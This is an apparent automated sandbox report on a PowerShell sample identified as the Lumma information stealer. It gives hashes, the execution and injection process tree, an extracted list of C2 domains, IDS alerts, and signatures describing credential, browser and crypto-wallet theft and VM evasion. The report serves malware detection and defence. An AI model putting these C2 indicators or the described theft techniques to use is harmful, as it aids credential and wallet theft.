Edit tour
Windows
Analysis Report
92.255.57_2.112.ps1
Overview
General Information
| Sample name: | 92.255.57_2.112.ps1 |
| Analysis ID: | 1590524 |
| MD5: | be4f493e0b615fa9df3216132c14f763 |
| SHA1: | dfda3628a9b8971a043fafab4c6ee95c8b4cd5cc |
| SHA256: | 229385fbe03dd8ab9489ee1f0f4a5916b89be800aa27b7d563b63080211235a9 |
| Tags: | bookingps1SPAM-ITAuser-JAMESWT_MHT |
| Infos: |   |
 | |
Detection
LummaC
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Classification
- System is w10x64
powershell.exe (PID: 7408 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -noLogo -E xecutionPo licy unres tricted -f ile "C:\Us ers\user\D esktop\92. 255.57_2.1 12.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9) 
conhost.exe (PID: 7416 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
RegSvcs.exe (PID: 7592 cmdline: "C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Svcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94) - RegSvcs.exe (PID: 7600 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Svcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94) - RegSvcs.exe (PID: 7608 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Svcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94) 
wermgr.exe (PID: 7616 cmdline: "C:\Window s\system32 \wermgr.ex e" "-outpr oc" "0" "7 408" "2496 " "2432" " 2500" "0" "0" "2468" "0" "0" " 0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution |
{"C2 url": ["curtainykeo.lat", "leggelatez.lat", "kickykiduz.lat", "savorraiykj.lat", "miniatureyu.lat", "finickypwk.lat", "bloodyswif.lat", "shoefeatthe.lat", "washyceehsu.lat"], "Build id": "atxOT1--traff12"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | ||
| JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security | ||
| JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
| Source: | Author: frack113: | ||
| Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): | ||
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-14T08:27:12.602411+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49730 | 104.102.49.254 | 443 | TCP |
| 2025-01-14T08:27:13.819855+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49732 | 188.114.96.3 | 443 | TCP |
| 2025-01-14T08:27:14.743708+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49736 | 188.114.96.3 | 443 | TCP |
| 2025-01-14T08:27:15.727636+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49738 | 188.114.96.3 | 443 | TCP |
| 2025-01-14T08:27:17.659036+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49740 | 188.114.96.3 | 443 | TCP |
| 2025-01-14T08:27:19.021812+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49741 | 188.114.96.3 | 443 | TCP |
| 2025-01-14T08:27:20.289084+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49743 | 188.114.96.3 | 443 | TCP |
| 2025-01-14T08:27:22.160237+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49745 | 188.114.96.3 | 443 | TCP |
| 2025-01-14T08:27:24.845892+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49748 | 188.114.96.3 | 443 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-14T08:27:14.261530+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49732 | 188.114.96.3 | 443 | TCP |
| 2025-01-14T08:27:15.093246+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 188.114.96.3 | 443 | TCP |
| 2025-01-14T08:27:25.345878+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49748 | 188.114.96.3 | 443 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-14T08:27:14.261530+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49732 | 188.114.96.3 | 443 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-14T08:27:15.093246+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 188.114.96.3 | 443 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-14T08:27:11.805855+0100 | 2059189 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 58984 | 1.1.1.1 | 53 | UDP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-14T08:27:11.927906+0100 | 2059191 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 53855 | 1.1.1.1 | 53 | UDP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-14T08:27:11.877255+0100 | 2059199 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 64720 | 1.1.1.1 | 53 | UDP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-14T08:27:11.830325+0100 | 2059201 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 56901 | 1.1.1.1 | 53 | UDP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-14T08:27:11.848565+0100 | 2059203 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 60048 | 1.1.1.1 | 53 | UDP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-14T08:27:11.893391+0100 | 2059207 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 60715 | 1.1.1.1 | 53 | UDP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-14T08:27:11.905812+0100 | 2059209 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 54093 | 1.1.1.1 | 53 | UDP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-14T08:27:11.817677+0100 | 2059211 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 60549 | 1.1.1.1 | 53 | UDP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-14T08:27:18.480783+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49740 | 188.114.96.3 | 443 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-14T08:27:13.109424+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49730 | 104.102.49.254 | 443 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection |   |
|---|
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Malware Configuration Extractor: | ||
| Source: | Integrated Neural Analysis Model: | ||
| Source: | String decryptor: | ||
| Source: | String decryptor: | ||
| Source: | String decryptor: | ||
| Source: | String decryptor: | ||
| Source: | String decryptor: | ||
| Source: | String decryptor: | ||
| Source: | String decryptor: | ||
| Source: | String decryptor: | ||
| Source: | String decryptor: | ||
| Source: | String decryptor: | ||
| Source: | String decryptor: | ||
| Source: | String decryptor: | ||
| Source: | String decryptor: | ||
| Source: | String decryptor: | ||
| Source: | String decryptor: | ||
| Source: | Code function: | 4_2_004182C0 | |
| Source: | Code function: | 4_2_00415D15 | |
| Source: | Code function: | 4_2_00418404 | |
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | Binary string: | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | Code function: | 4_2_00427A50 | |
| Source: | Code function: | 4_2_0040BA29 | |
| Source: | Code function: | 4_2_0040CB44 | |
| Source: | Code function: | 4_2_0042D420 | |
| Source: | Code function: | 4_2_00423E44 | |
| Source: | Code function: | 4_2_00408740 | |
| Source: | Code function: | 4_2_00429871 | |
| Source: | Code function: | 4_2_0042E002 | |
| Source: | Code function: | 4_2_0042E002 | |
| Source: | Code function: | 4_2_0042A810 | |
| Source: | Code function: | 4_2_004288BA | |
| Source: | Code function: | 4_2_00402940 | |
| Source: | Code function: | 4_2_0040A910 | |
| Source: | Code function: | 4_2_004161DF | |
| Source: | Code function: | 4_2_004251E8 | |
| Source: | Code function: | 4_2_00426A00 | |
| Source: | Code function: | 4_2_00438AF0 | |
| Source: | Code function: | 4_2_0041AA90 | |
| Source: | Code function: | 4_2_0041AA90 | |
| Source: | Code function: | 4_2_004082A0 | |
| Source: | Code function: | 4_2_0043EB00 | |
| Source: | Code function: | 4_2_00420B10 | |
| Source: | Code function: | 4_2_00440310 | |
| Source: | Code function: | 4_2_004273A0 | |
| Source: | Code function: | 4_2_004273A0 | |
| Source: | Code function: | 4_2_004273A0 | |
| Source: | Code function: | 4_2_0041DC40 | |
| Source: | Code function: | 4_2_00417451 | |
| Source: | Code function: | 4_2_00407400 | |
| Source: | Code function: | 4_2_00407400 | |
| Source: | Code function: | 4_2_0043C410 | |
| Source: | Code function: | 4_2_0043C410 | |
| Source: | Code function: | 4_2_00415C25 | |
| Source: | Code function: | 4_2_0042B430 | |
| Source: | Code function: | 4_2_00408CD0 | |
| Source: | Code function: | 4_2_00426D70 | |
| Source: | Code function: | 4_2_0042DD30 | |
| Source: | Code function: | 4_2_0042E5C2 | |
| Source: | Code function: | 4_2_004165EE | |
| Source: | Code function: | 4_2_00415590 | |
| Source: | Code function: | 4_2_004095A0 | |
| Source: | Code function: | 4_2_00415E42 | |
| Source: | Code function: | 4_2_00413E50 | |
| Source: | Code function: | 4_2_0040DE72 | |
| Source: | Code function: | 4_2_00425E00 | |
| Source: | Code function: | 4_2_00425E00 | |
| Source: | Code function: | 4_2_0043EE10 | |
| Source: | Code function: | 4_2_00408EB0 | |
| Source: | Code function: | 4_2_0041DEB0 | |
| Source: | Code function: | 4_2_0041F710 | |
| Source: | Code function: | 4_2_0041F710 | |
| Source: | Code function: | 4_2_004427E0 | |
| Source: | Code function: | 4_2_0042E7EB | |
| Source: | Code function: | 4_2_0040DFEA | |
| Source: | Code function: | 4_2_0042F799 | |
| Source: | Code function: | 4_2_0042DFAF | |
Networking | |
|---|
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | URLs: | ||
| Source: | URLs: | ||
| Source: | URLs: | ||
| Source: | URLs: | ||
| Source: | URLs: | ||
| Source: | URLs: | ||
| Source: | URLs: | ||
| Source: | URLs: | ||
| Source: | URLs: | ||
| Source: | IP Address: | ||
| Source: | IP Address: | ||
| Source: | IP Address: | ||
| Source: | ASN Name: | ||
| Source: | JA3 fingerprint: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | HTTP traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | Code function: | 4_2_004363E0 | |
| Source: | Code function: | 4_2_004363E0 | |
| Source: | Code function: | 4_2_00436590 | |
| Source: | Window created: | Jump to behavior | ||
| Source: | Code function: | 0_2_00007FFD9B8A6232 | |
| Source: | Code function: | 0_2_00007FFD9B8AA769 | |
| Source: | Code function: | 0_2_00007FFD9B8AA7A0 | |
| Source: | Code function: | 0_2_00007FFD9B970FA4 | |
| Source: | Code function: | 4_2_00415975 | |
| Source: | Code function: | 4_2_00427A50 | |
| Source: | Code function: | 4_2_00440A0D | |
| Source: | Code function: | 4_2_00420440 | |
| Source: | Code function: | 4_2_00410446 | |
| Source: | Code function: | 4_2_00442460 | |
| Source: | Code function: | 4_2_00442DE0 | |
| Source: | Code function: | 4_2_00423E44 | |
| Source: | Code function: | 4_2_0040AE60 | |
| Source: | Code function: | 4_2_0042DEE5 | |
| Source: | Code function: | 4_2_0040D690 | |
| Source: | Code function: | 4_2_00408740 | |
| Source: | Code function: | 4_2_0043B7B0 | |
| Source: | Code function: | 4_2_00430050 | |
| Source: | Code function: | 4_2_00411078 | |
| Source: | Code function: | 4_2_0042A810 | |
| Source: | Code function: | 4_2_00433810 | |
| Source: | Code function: | 4_2_004270D0 | |
| Source: | Code function: | 4_2_004058E0 | |
| Source: | Code function: | 4_2_0042D893 | |
| Source: | Code function: | 4_2_004148B0 | |
| Source: | Code function: | 4_2_004288BA | |
| Source: | Code function: | 4_2_00436140 | |
| Source: | Code function: | 4_2_0040A910 | |
| Source: | Code function: | 4_2_00441910 | |
| Source: | Code function: | 4_2_00403920 | |
| Source: | Code function: | 4_2_0043912C | |
| Source: | Code function: | 4_2_004091C0 | |
| Source: | Code function: | 4_2_004161DF | |
| Source: | Code function: | 4_2_004311E6 | |
| Source: | Code function: | 4_2_00432188 | |
| Source: | Code function: | 4_2_00406190 | |
| Source: | Code function: | 4_2_0042F195 | |
| Source: | Code function: | 4_2_004421B0 | |
| Source: | Code function: | 4_2_0041E250 | |
| Source: | Code function: | 4_2_00441A56 | |
| Source: | Code function: | 4_2_0041B200 | |
| Source: | Code function: | 4_2_004042D0 | |
| Source: | Code function: | 4_2_0041BAD0 | |
| Source: | Code function: | 4_2_00433AD0 | |
| Source: | Code function: | 4_2_00431A88 | |
| Source: | Code function: | 4_2_00441A94 | |
| Source: | Code function: | 4_2_0041AA90 | |
| Source: | Code function: | 4_2_00442A90 | |
| Source: | Code function: | 4_2_004082A0 | |
| Source: | Code function: | 4_2_0041CAA0 | |
| Source: | Code function: | 4_2_0043CAA7 | |
| Source: | Code function: | 4_2_004412B1 | |
| Source: | Code function: | 4_2_00441B40 | |
| Source: | Code function: | 4_2_0041C370 | |
| Source: | Code function: | 4_2_00420B10 | |
| Source: | Code function: | 4_2_00402B20 | |
| Source: | Code function: | 4_2_00411B20 | |
| Source: | Code function: | 4_2_0042ABC0 | |
| Source: | Code function: | 4_2_00441BD0 | |
| Source: | Code function: | 4_2_004273A0 | |
| Source: | Code function: | 4_2_0043AC40 | |
| Source: | Code function: | 4_2_00417451 | |
| Source: | Code function: | 4_2_00441C60 | |
| Source: | Code function: | 4_2_00419470 | |
| Source: | Code function: | 4_2_00407400 | |
| Source: | Code function: | 4_2_00404C00 | |
| Source: | Code function: | 4_2_0043C410 | |
| Source: | Code function: | 4_2_0042ECD0 | |
| Source: | Code function: | 4_2_00439CD8 | |
| Source: | Code function: | 4_2_00440CD8 | |
| Source: | Code function: | 4_2_00414C9C | |
| Source: | Code function: | 4_2_0042CCA0 | |
| Source: | Code function: | 4_2_0040E4B0 | |
| Source: | Code function: | 4_2_00426D70 | |
| Source: | Code function: | 4_2_00428D76 | |
| Source: | Code function: | 4_2_00422D17 | |
| Source: | Code function: | 4_2_004245C0 | |
| Source: | Code function: | 4_2_004165EE | |
| Source: | Code function: | 4_2_00415590 | |
| Source: | Code function: | 4_2_004095A0 | |
| Source: | Code function: | 4_2_00415E42 | |
| Source: | Code function: | 4_2_00413E50 | |
| Source: | Code function: | 4_2_0041BE00 | |
| Source: | Code function: | 4_2_00406620 | |
| Source: | Code function: | 4_2_00402EF0 | |
| Source: | Code function: | 4_2_0043EE80 | |
| Source: | Code function: | 4_2_0043AEA0 | |
| Source: | Code function: | 4_2_0043974A | |
| Source: | Code function: | 4_2_00419710 | |
| Source: | Code function: | 4_2_0041F710 | |
| Source: | Code function: | 4_2_0041C7D0 | |
| Source: | Code function: | 4_2_004427E0 | |
| Source: | Code function: | 4_2_00427F8D | |
| Source: | Classification label: | ||
| Source: | Code function: | 4_2_0043B7B0 | |
| Source: | File created: | Jump to behavior | ||
| Source: | Mutant created: | ||
| Source: | Mutant created: | ||
| Source: | Mutant created: | ||
| Source: | File created: | Jump to behavior | ||
| Source: | File read: | Jump to behavior | ||
| Source: | Key opened: | Jump to behavior | ||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Window detected: | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | Binary string: | ||
| Source: | Code function: | 0_2_00007FFD9B8A09C9 | |
| Source: | Code function: | 0_2_00007FFD9B8AD5D3 | |
| Source: | Code function: | 0_2_00007FFD9B972B59 | |
| Source: | Code function: | 4_2_00441864 | |
| Source: | Code function: | 4_2_0043A6FE | |
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
